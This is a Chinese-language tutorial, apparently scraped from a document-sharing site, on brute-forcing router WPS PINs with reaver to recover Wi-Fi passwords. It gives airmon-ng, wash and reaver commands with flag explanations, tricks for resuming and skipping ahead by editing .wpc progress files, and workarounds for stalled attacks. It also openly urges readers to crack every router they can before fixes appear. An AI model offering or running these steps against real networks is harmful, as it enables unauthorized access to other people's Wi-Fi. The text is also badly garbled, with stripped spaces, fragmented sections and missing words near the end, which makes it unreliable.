reaver參數(shù)詳解和死循環(huán)解決方法

1、ReaverReaver基本命令參數(shù)XiaoPanOS下：選擇“終端”輸入sudothunar這里是為了取得超級(jí)權(quán)限，選擇系統(tǒng)文件-usr-local-ect-reaveifconfig-a確認(rèn)你用哪一個(gè)網(wǎng)卡WLAN0或WLAN1airmon-ngstartwlan0/開(kāi)啟監(jiān)聽(tīng)模式wash-imon0-C/查看開(kāi)啟wps的無(wú)線路由器airodump-ngmon0/查看周邊AP信息（抓包）reaver-imon0-bMAC-a-S-vv-d3-t3/開(kāi)始窮舉PIN碼reaver-imon0-bMAC-a-S-vv-d0/加快速度為1秒reaver-imon0-bMAC-a-S-vv-pxxxx/

2、從前4位PIN碼開(kāi)始reave的進(jìn)度表文件保存在:版：/etc/reaver/MAC地址.wpc版：/usr/local/etc/reaver/MAC地址.wpcCDliunx下：選擇“終端”輸入sudothunar這里是為了取得超級(jí)權(quán)限，選擇系統(tǒng)文件-usr-local-ect-reaver-reaver必需的參數(shù):-i,-interface=wlanNameofthemonitor-modeinterfacetouse/監(jiān)視模式接口使用的名稱-b,-bssid=macBSSIDofthetargetAP目標(biāo)AP的SSIDreaver可選參數(shù):-m,-mac=macMACofthehosts

3、ystem/主機(jī)系統(tǒng)的MAC-e,-essid=ssidESSIDofthetargetAP/目標(biāo)AP的ESSID-c,-channel=channelSetthe802.11channelfortheinterface（implies-f）/設(shè)置接口的802.11信道（意味著-f）-o,-out-file=fileSendoutputtoalogfilestdout/輸出發(fā)送到一個(gè)日志文件-s,-session=fileRestoreaprevioussessionfile/恢復(fù)以前的記錄文件-C,-exec=commandExecutethesuppliedcommanduponsucce

4、ssfulpinrecovery/所提供的命令執(zhí)行成功后，pin恢復(fù)-D,-daemonizeDaemonizereaver/守護(hù)進(jìn)程reaver-a,-autoAutodetectthebestadvancedoptionsforthetargetAP/自動(dòng)檢測(cè)目標(biāo)AP的最先進(jìn)的選項(xiàng)-f,-fixedDisablechannelhopping/禁用信道跳頻-5,-5ghzUse5GHz802.11channels/使用5GHz的802.11信道-v,-verboseDisplaynon-criticalwarnings(-vvformore)/顯示非關(guān)鍵的警告(-VV更多)-q,-quiet

5、Onlydisplaycriticalmessages/僅顯示重要消息-h,-helpShowhelp/顯示幫助reaver高級(jí)選項(xiàng)：-p,-pin=wpspinUsethespecified4or8digitWPSpin/使用指定的4個(gè)或8個(gè)的pinWPS-d,-delay=secondsSetthedelaybetweenpinattempts1/設(shè)置pin嘗試之間的延遲1-l,-lock-delay=secondsSetthetimetowaitiftheAPlocksWPSpinattempts60/設(shè)置等待的時(shí)間，如果AP鎖定WPSPIN嘗試60-g,-max-attempts=nu

6、mQuitafternumpinattempts/退出后NUMpin嘗試-x,-fail-wait=secondsSetthetimetosleepafter10unexpectedfailures0/設(shè)定時(shí)間后進(jìn)入休眠100意外故障-r,-recurring-delay=xySleepforysecondseveryxpinattempts/對(duì)每一個(gè)pin碼嘗試Y秒-t,-timeout=secondsSetthereceivetimeoutperiod5/設(shè)置接收超時(shí)時(shí)間5-T,-m57-timeout=secondsSettheM5M7timeoutperiod0.20/設(shè)置M5M7超時(shí)

7、期0.20-A,-no-associateDonotassociatewiththeAP(associationmustbedonebyanotherapplication)/不要與AP關(guān)聯(lián)(協(xié)會(huì)必須由另一個(gè)應(yīng)用程序進(jìn)行)-N,-no-nacksDonotsendNACKmessageswhenoutoforderpacketsarereceived/不要發(fā)送NACK消息收到時(shí)，為了包出-S,-dh-smallUsesmallDHkeystoimprovecrackspeed/使用小DH密鑰，以提高PJ速度-L,-ignore-locksIgnorelockedstatereportedbyt

8、hetargetAP/忽略鎖定狀態(tài)的目標(biāo)AP-E,-eap-terminateTerminateeachWPSsessionwithanEAPFAILpacket/終止每一個(gè)EAP失敗包WPS的記錄-n,-nackTargetAPalwayssendsaNACKAuto目標(biāo)AP發(fā)送一個(gè)NACK自動(dòng)-w,-win7MimicaWindows7registrarFalse/模仿Windows7的注冊(cè)處處長(zhǎng)虛假reaver使用方法和技巧:reaver使用方法:reaver-imon0-bxx:xx:xx:xx:xx-a-S-vv-c頻道-i監(jiān)聽(tīng)后接口名稱-b目標(biāo)mac地址-a自動(dòng)檢測(cè)目標(biāo)AP最佳配置

9、-S使用最小的DHkey，可以提高PJ速度-vv顯示更多的非嚴(yán)重警告-d即delay每窮舉一次的閑置時(shí)間預(yù)設(shè)為1秒-c頻道-pPIN碼四位或八位可以用8位直接找到密碼。當(dāng)出現(xiàn)有百分?jǐn)?shù)時(shí)你就可以用crtl+c來(lái)暫停，它會(huì)將reaver的進(jìn)度表文件保存在版：/etc/reaver/MAC地址.wpc版：/usr/local/etc/reaver/MAC地址.wpc(tmp/minidwep/MAC地址.wpc)用資源管理器，手工將以MAC地址命名的、后輟為wpc的文件拷貝到U盤(pán)或硬盤(pán)中，下次重啟動(dòng)后，再手工復(fù)制至O/etc/reaver/目錄下即可。注意需要取得ROOT權(quán)限,才可將wpc文件復(fù)制到

10、/etc/reaver/目錄下：在終端模擬里面輸入:SUDOSUSUDOTHUNARreaver使用技巧:1、將mac地址.wpc備份后，下次可以繼續(xù)使用。2、程序默認(rèn)每嘗試后停止一秒，加入-dO參數(shù)使之不停止：reaver-imon0-bC8：3A：35：F6：BB：B8-vv-d03、-p參數(shù)：-pPIN可以讓你在獲取到PIN的情況下直接得到路由WPA密碼！reaver-imonO-bMAC-pPIN4、wpc結(jié)構(gòu)0/這個(gè)地方是說(shuō)它的前4位PIN碼的進(jìn)度位置數(shù)，真實(shí)位置要+40這個(gè)地方是說(shuō)后3位PIN數(shù)的已經(jīng)運(yùn)行測(cè)試位置數(shù)0/0時(shí)沒(méi)有找到，當(dāng)為1時(shí)找到前四位，當(dāng)為2時(shí)全部找到。下面是1萬(wàn)個(gè)

11、前四位數(shù)(reaver1.3版4位隨機(jī)數(shù)，1.4版是升序)第4行起000000019999下面是1千個(gè)三位數(shù)（PIN第八位數(shù)是驗(yàn)證碼）從1004行起000999所以前四位很重要，將已經(jīng)知道的前四位放在最前面會(huì)提高你的PIN速度，我們也可以手動(dòng)修改wpc文件第一行，如我們要從3000開(kāi)始pin你可以將它修改為3004,這樣它就會(huì)從3000開(kāi)始PIN了。當(dāng)我們?cè)赑IN時(shí)就可以不用保存虛擬機(jī)快照了，只要你記住了前四位，你下載用軟件修改WPC文件就可了。cdlinux對(duì)wpc文件最方便，beini和xiaopan對(duì)wpc修改要用命令vi來(lái)修改，vi的使用方法很簡(jiǎn)單viXXXX.wpc打開(kāi)就可以了，輸入

12、i進(jìn)行編輯，輸入escap退回命令模式，輸入:wq退出保存。Pin碼重復(fù)出現(xiàn)死循環(huán)解決之道：xiaopanOS環(huán)境解決之道：當(dāng)你看到PIN到一定程度，窗口里的PIN碼不變、進(jìn)度百分比也不走，那么，保持原窗口不變，再點(diǎn)擊ROOTSHELL圖標(biāo)，新開(kāi)一個(gè)PIN窗口，輸入“reaver-imon0-b（正在PIN的目標(biāo)MAC）-a-s-vv”（注意：這里“S”要小寫(xiě)）那么，你就會(huì)發(fā)現(xiàn)原來(lái)PIN的窗口，PIN碼開(kāi)始改變，進(jìn)度開(kāi)始前進(jìn)了！而且PIN的時(shí)間也大為縮短了！如果是破解到99.99%，執(zhí)行此部操作就馬上彈出正確的pin碼和wifi密碼，以及路由器的SSID。CDlinux環(huán)境解決之道：當(dāng)你看到P

13、IN到一定程度，窗口里的PIN碼不變、進(jìn)度百分比也不走，那么，請(qǐng)Ctrl+C停止，然后點(diǎn)擊Reaver按鈕，在彈出的窗口中輸入“-a-s-vv“（注意：這里“S”要小寫(xiě)）那么，你就會(huì)發(fā)現(xiàn)原來(lái)PIN的窗口，PIN碼開(kāi)始改變，進(jìn)度開(kāi)始前進(jìn)了！而且PIN的時(shí)間也大為縮短了！，如果是破解到99.99%，執(zhí)行此部操作就馬上彈出正確的pin碼和wifi密碼，以及路由器的SSID。若到90.9%或99.9%還是不出，也可以試試“reaver-imon0-b（正在PIN的目標(biāo)MAC）-v-a-n-c”時(shí)間及經(jīng)驗(yàn)總結(jié)，基本90.9%和99.9%的死循環(huán)，已經(jīng)100%成功了，最后祝大家破解愉快！一、激活監(jiān)聽(tīng)模式二

14、、查看周邊觀察要破向。，信息，的，小于三、按四、抓例如：基本上會(huì)終止抓包碼：左右則非常順暢秒攻擊一次版可用：注意，中冒號(hào)不可省略,感覺(jué)比特別提示：只有開(kāi)啟了地址的字母大小寫(xiě)均可,更4穩(wěn)定些。、功能，才可以用法破（可用一個(gè)）是兩個(gè)不是！密碼用碼破特點(diǎn)：1、不需要客戶端，2有碼就能獲得無(wú)線密碼，3八位數(shù)碼實(shí)際只有一萬(wàn)一千組隨機(jī)密碼，4抓包、跑包，每個(gè)環(huán)節(jié)都有很大的不確定性。而破密，只要開(kāi)戶，破密只是個(gè)時(shí)間問(wèn)題。提醒：大家還是早點(diǎn)都把能的路由都破了！可能馬上就有安全補(bǔ)救方案出來(lái)了！到時(shí)候就沒(méi)機(jī)會(huì)了，時(shí)不我待、只爭(zhēng)朝夕！T、都支持運(yùn)行。使用方法、步驟：打開(kāi)超級(jí)終端確認(rèn)你用哪一個(gè)網(wǎng)卡如果電腦裝有多個(gè)無(wú)線

15、網(wǎng)卡，請(qǐng)先發(fā)指令或F面的指令都是以單一網(wǎng)卡為例（抓包）：信號(hào)強(qiáng)弱變化，注意同頻干擾，調(diào)整網(wǎng)卡放置位置和角度、方如何查看是否開(kāi)了、呢？一、使用指令一欄下，出現(xiàn)（看清楚有點(diǎn)“”）是開(kāi)的下，用通常的方式連接，如果在提示輸入密碼框下面，出現(xiàn)“通過(guò)按路由器按鈕也可以連接”，就確認(rèn)此開(kāi)了、。但是，下不出現(xiàn)“通過(guò)按路由器按鈕也可以連接”，不等于沒(méi)開(kāi)。還是準(zhǔn)。關(guān)閉了、或者沒(méi)有滴，會(huì)出現(xiàn)“破密對(duì)信號(hào)要求極為嚴(yán)格，如果信號(hào)稍差，可能導(dǎo)致破密進(jìn)度變慢或者路由死鎖等（重復(fù)同一個(gè)碼或）。特別是1默認(rèn)頻道中，有較多的，相互干擾。因此，確定網(wǎng)卡放置的最佳位置、方向、角度十分重要。破解過(guò)程中重復(fù)同一個(gè)碼或可隨時(shí)隨地按終止，會(huì)自動(dòng)保存進(jìn)度。若繼續(xù)破，則再次在終端中發(fā)送，這個(gè)命令運(yùn)行后，會(huì)讓你選或，選后就繼續(xù)了。當(dāng)確定前位密碼后，其工作完成任務(wù)進(jìn)度數(shù)值將直接跳躍至以上，也就是說(shuō)只剩余一千個(gè)密碼組合了。總共一萬(wàn)一千個(gè)密碼。如果，進(jìn)程后死機(jī)或停機(jī)，請(qǐng)記下前四位數(shù)，用指令：前四位數(shù)會(huì)從指定段起破密。如何保存破密進(jìn)程呢：的進(jìn)度表文件保存在版